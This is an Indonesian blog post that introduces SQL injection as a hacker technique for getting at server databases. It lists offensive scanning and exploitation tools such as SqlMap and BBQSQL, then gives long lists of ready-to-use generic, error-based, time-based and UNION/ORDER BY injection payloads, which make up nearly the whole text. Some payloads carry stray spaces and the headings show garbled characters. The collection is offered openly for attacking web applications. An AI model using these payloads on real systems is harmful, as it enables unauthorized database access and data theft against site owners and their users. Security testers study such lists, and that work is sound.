Iklan Billboard

Kumpulan Payload SQL Injection


SQL injection adalah teknik yang sering digunakan oleh hacker untuk merusak keamanan aplikasi Web, Cara ini biasanya untuk mendapatkan database yang dimiliki oleh server. Pada Kesempatan kali ini kami akan sharing Kumpulan payload SQL Injection.

Apa itu Payload ? Payload adalah struktur kode khusus untuk mengirim kode data yang kita gunakan biasanya mengandung kesalahan bug dalam (url host). sebagai pengantar atau pengiring untuk mengeksploitasi yang digunakan untuk mengeksekusi shellcode. payload juga akan menjalankan shellcode masuk pada target untuk mendapatkan akses. Payload bervariasi tergantung pada apa yang ingin kita lakukan.

Sebelumnya kami juga akan sharing beberapa tools dari Github untuk melakukan Scan Vulnerability SQL Injection.

SqlMap - Automatic SQL Injection and database Acquisition Tool
jSQL Injection - Java Tool Untuk Automatic SQL Database Injection\
BBQSQL - A-Blind SQL Injection Exploit Tool
NoSQLMap - Automated NoSQL database Pwnage
Whitewidow - SQL Vulnerability Scanner
DSSS - Damn Small SQLi Scanner
explo - Man And Machine Readable Format Web Vulnerability Testing
Blind-Sql-Bit Shifting - Blind SQL-Injection melalui BitShifting
Leviathan - Wide Range Mass Audit Toolkit
Blisqy - Time-based Exploit blind SQL-injection in HTTP headers (MySQL / MariaDB)

๐Ÿ”˜ Generic SQL Injection Payloads
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or # 
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2

/*รข€¦*/ 
+  addition, concatenate (or space in url)
||  (double pipe) concatenate
%  wildcard attribute indicator

@variable local variable
@@variable global variable


# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2


1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+

1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --


-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --


-1 UNION SELECT 1 INTO @,@
-1 UN   ION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1 

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --


Finding the table name


Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

Comments:

#     Hash comment
/*   C-style comment
-- - SQL comment
; Nullbyte
`     Backtick

๐Ÿ”˜ Generic Error Based Payloads

OR 1=1
 OR 1=0
 OR x=x
 OR x=y
 OR 1=1#
 OR 1=0#
 OR x=x#
 OR x=y#
 OR 1=1-- 
 OR 1=0-- 
 OR x=x-- 
 OR x=y-- 
 OR 3409=3409 AND ('pytW' LIKE 'pytW
 OR 3409=3409 AND ('pytW' LIKE 'pytY
 HAVING 1=1
 HAVING 1=0
 HAVING 1=1#
 HAVING 1=0#
 HAVING 1=1-- 
 HAVING 1=0-- 
 AND 1=1
 AND 1=0
 AND 1=1-- 
 AND 1=0-- 
 AND 1=1#
 AND 1=0#
 AND 1=1 AND '%'='
 AND 1=0 AND '%'='
 AND 1083=1083 AND (1427=1427
 AND 7506=9091 AND (5913=5913
 AND 1083=1083 AND ('1427=1427
 AND 7506=9091 AND ('5913=5913
 AND 7300=7300 AND 'pKlZ'='pKlZ
 AND 7300=7300 AND 'pKlZ'='pKlY
 AND 7300=7300 AND ('pKlZ'='pKlZ
 AND 7300=7300 AND ('pKlZ'='pKlY
 AS INJECTX WHERE 1=1 AND 1=1
 AS INJECTX WHERE 1=1 AND 1=0
 AS INJECTX WHERE 1=1 AND 1=1#
 AS INJECTX WHERE 1=1 AND 1=0#
 AS INJECTX WHERE 1=1 AND 1=1--
 AS INJECTX WHERE 1=1 AND 1=0--
 WHERE 1=1 AND    1=1
 WHERE 1=1 AND 1=0
 WHERE 1=1 AND 1=1#
 WHERE 1=1 AND 1=0#
 WHERE 1=1 AND 1=1--
 WHERE 1=1 AND 1=0--
 ORDER BY 1-- 
 ORDER BY 2-- 
 ORDER BY 3-- 
 ORDER BY 4-- 
 ORDER BY 5-- 
 ORDER BY 6-- 
 ORDER BY 7-- 
 ORDER BY 8-- 
 ORDER BY 9-- 
 ORDER BY 10-- 
 ORDER BY 11-- 
 ORDER BY 12-- 
 ORDER BY 13-- 
 ORDER BY 14-- 
 ORDER BY 15-- 
 ORDER BY 16-- 
 ORDER BY 17-- 
 ORDER BY 18-- 
 ORDER BY 19-- 
 ORDER BY 20-- 
 ORDER BY 21-- 
 ORDER BY 22-- 
 ORDER BY 23-- 
 ORDER BY 24-- 
 ORDER BY 25-- 
 ORDER BY 26-- 
 ORDER BY 27-- 
 ORDER BY 28-- 
 ORDER BY 29-- 
 ORDER BY 30-- 
 ORDER BY 31337-- 
 ORDER BY 1# 
 ORDER BY 2# 
 ORDER BY 3# 
 ORDER BY 4# 
 ORDER BY 5# 
 ORDER BY 6# 
 ORDER BY 7# 
 ORDER BY 8# 
 ORDER BY 9# 
 ORDER BY 10# 
 ORDER BY 11# 
 ORDER BY 12# 
 ORDER BY 13# 
 ORDER BY 14#  ORDER BY 15# 
 ORDER BY 16# 
 ORDER BY 17# 
 ORDER BY 18# 
 ORDER BY 19# 
 ORDER BY 20# 
 ORDER BY 21# 
 ORDER BY 22# 
 ORDER BY 23# 
 ORDER BY 24# 
 ORDER BY 25# 
 ORDER BY 26# 
 ORDER BY 27# 
 ORDER BY 28# 
 ORDER BY 29# 
 ORDER BY 30#
 ORDER BY 31337#
 ORDER BY 1 
 ORDER BY 2 
 ORDER BY 3 
 ORDER BY 4 
 ORDER BY 5 
 ORDER BY 6 
 ORDER BY 7 
 ORDER BY 8 
 ORDER BY 9 
 ORDER BY 10 
 ORDER BY 11 
 ORDER BY 12 
 ORDER BY 13 
 ORDER BY 14 
 ORDER BY 15 
 ORDER BY 16 
 ORDER BY 17 
 ORDER BY 18 
 ORDER BY 19 
 ORDER BY 20 
 ORDER BY 21 
 ORDER BY 22 
 ORDER BY 23 
 ORDER BY 24 
 ORDER BY 25 
 ORDER BY 26 
 ORDER BY 27 
 ORDER BY 28 
 ORDER BY 29 
 ORDER BY 30 
 ORDER BY 31337 
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
 RLIKE (SELECT (CASE WHEN (43   46=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
 and (select substring(@@version,1,1))='X'
 and (select substring(@@version,1,1))='M'
 and (select substring(@@version,2,1))='i'
 and (select substring(@@version,2,1))='y'
 and (select substring(@@version,3,1))='c'
 and (select substring(@@version,3,1))='S'
 and (select substring(@@version,3,1))='X'

๐Ÿ”˜ Generic Time Based SQL Injection Payloads


# from wapiti
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)-   -
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SL   EEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

๐Ÿ”˜ Generic Union Select Payloads


ORDER BY SLEEP(5)
 ORDER BY 1,SLEEP(5)
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,   15
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25   
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 ORDER BY SLEEP(5)#
 ORDER BY 1,SLEEP(5)#
 ORDER BY 1,SLEEP(5),3#
 ORDER BY 1,SLEEP(5),3,4#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
 ORDER BY 1,SLEEP(5),BENCHMARK   (1000000,MD5('A')),4,5,6,7,8,9#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,   7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,   6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
 ORDER BY SLEEP(5)-- 
 ORDER BY 1,SLEEP(5)-- 
 ORDER BY 1,SLEEP(5),3-- 
 ORDER BY 1,SLEEP(5),3,4-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,   8,9,10,11,12,13,14-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
 ORDER    BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
 UNION ALL SELECT 1
 UNION ALL SELECT 1,2
 UNION ALL SELECT 1,2,3
 UNION ALL SELECT 1,2,3,4
 UNION ALL SELECT 1,2,3,4,5
 UNION AL   L SELECT 1,2,3,4,5,6
 UNION ALL SELECT 1,2,3,4,5,6,7
 UNION ALL SELECT 1,2,3,4,5,6,7,8
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19   ,20,21,22,23
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 UNION ALL SELECT 1#
 UNION ALL SELECT 1,2#
 UNION ALL SELECT 1,2,3#
 UNION ALL SELECT 1,2,3,4#
 UNION ALL SELECT 1,2,3,4,5#
 UNION ALL SELECT 1,2,3,4,5,6#
 UNION ALL SELECT 1,2,3,4,5,6,7#
 UNION ALL SELECT 1,2,3,4,5,6,7,8#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
 UNION ALL SELECT 1,2,3,4   ,5,6,7,8,9,10#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13   ,14,15,16,17,18,19,20,21,22,23,24,25#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
 UNION ALL SELECT 1-- 
 UNION ALL SELECT 1,2-- 
 UNION ALL SELECT 1,2,3-- 
 UNION ALL SELECT 1,2,3,4-- 
 UNION ALL SELECT 1,2,3,4,5-- 
 UNION ALL SELECT 1,2,3,4,5,6-- 
 UNION ALL SELECT 1,2,3,4,5,6,7-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- 
 UN   ION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,   15,16,17,18,19,20,21,22,23,24,25,26-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
